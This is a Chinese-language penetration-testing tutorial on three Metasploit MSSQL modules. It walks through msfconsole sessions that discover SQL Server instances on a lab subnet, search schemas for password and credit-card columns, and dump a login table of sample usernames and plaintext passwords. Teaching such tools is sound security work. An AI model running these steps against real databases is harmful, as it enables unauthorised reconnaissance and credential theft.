mssql_ping
该“mssql_ping”模块查询UDP端口1434上的主机的主机或范围,以确定任何MSSQL服务器的监听TCP端口,如果有的话。MSSQL随机化它监听的TCP端口,所以这是Metasploit框架中非常有价值的模块。
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > show options
Module options (auxiliary/scanner/mssql/mssql_ping):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target address range or CIDR identifier
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
要配置模块,我们设置RHOSTS和THREADS值,并让它对我们的目标运行。
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.200-254
RHOSTS => 192.168.1.200-254
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > run
[*] Scanned 13 of 55 hosts (023% complete)
[*] Scanned 16 of 55 hosts (029% complete)
[*] Scanned 17 of 55 hosts (030% complete)
[*] SQL Server information for 192.168.1.217:
[*] tcp = 27900
[*] np = \\SERVER2\pipe\sql\query
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = SERVER2
[*] SQL Server information for 192.168.1.241:
[*] tcp = 1433
[*] np = \\2k3\pipe\sql\query
[*] Version = 8.00.194
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = 2k3
[*] Scanned 32 of 55 hosts (058% complete)
[*] Scanned 40 of 55 hosts (072% complete)
[*] Scanned 44 of 55 hosts (080% complete)
[*] Scanned 45 of 55 hosts (081% complete)
[*] Scanned 46 of 55 hosts (083% complete)
[*] Scanned 50 of 55 hosts (090% complete)
[*] Scanned 55 of 55 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) >
从模块输出中可以看出,它不仅返回侦听的TCP端口,还返回其他有价值的信息,例如InstanceName和ServerName值。
mssql_idf
该“mssql_idf”(有趣的数据搜索)模块将使用一组给定的凭据连接到远程服务器MSSQL和搜索行和列“有趣”的名字。这些信息可以帮助您调整对数据库的进一步攻击。
msf > use auxiliary/admin/mssql/mssql_idf
msf auxiliary(mssql_idf) > show options
Module options (auxiliary/admin/mssql/mssql_idf):
Name Current Setting Required Description
---- --------------- -------- -----------
NAMES passw|bank|credit|card yes Pipe separated list of column names
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as
要配置模块,我们将它设置为查找“用户名”和“密码”的字段名称,以及系统的已知密码和我们的RHOST值。
msf auxiliary(mssql_idf) > set NAMES username|password
NAMES => username|password
msf auxiliary(mssql_idf) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_idf) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_idf) > run
Database Schema Table Column Data Type Row Count
======== ====== ============== ===================== ========= ========= ======== ====== ============== ===================== ========= =========
msdb dbo sysmail_server username nvarchar 0
msdb dbo backupmediaset is_password_protected bit 0
msdb dbo backupset is_password_protected bit 0
logins dbo userpass username varchar 3
logins dbo userpass password varchar 3
[*] Auxiliary module execution completed
msf auxiliary(mssql_idf) >
从模块输出中可以看到,扫描器通过包含用户名和密码列的'userpass'表找到我们的'登录'数据库。
mssql_sql
该“mssql_sql”模块允许您使用已知良好的凭据对数据库执行SQL查询。
msf > use auxiliary/admin/mssql/mssql_sql
msf auxiliary(mssql_sql) > show options
Module options (auxiliary/admin/mssql/mssql_sql):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port (TCP)
SQL select @@version no The SQL query to execute
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
为了配置这个模块,我们设置了PASSWORD和RHOST值,然后设置了我们想要的SQL命令,并让它运行。
msf auxiliary(mssql_sql) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_sql) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_sql) > set SQL use logins;select * from userpass
SQL => use logins;select * from userpass
msf auxiliary(mssql_sql) > run
[*] SQL Query: use logins;select * from userpass
[*] Row Count: 3 (Status: 16 Command: 193)
userid username password
------ -------- --------
1 bjohnson password
2 aadams s3cr3t
3 jsmith htimsj
[*] Auxiliary module execution completed
msf auxiliary(mssql_sql) >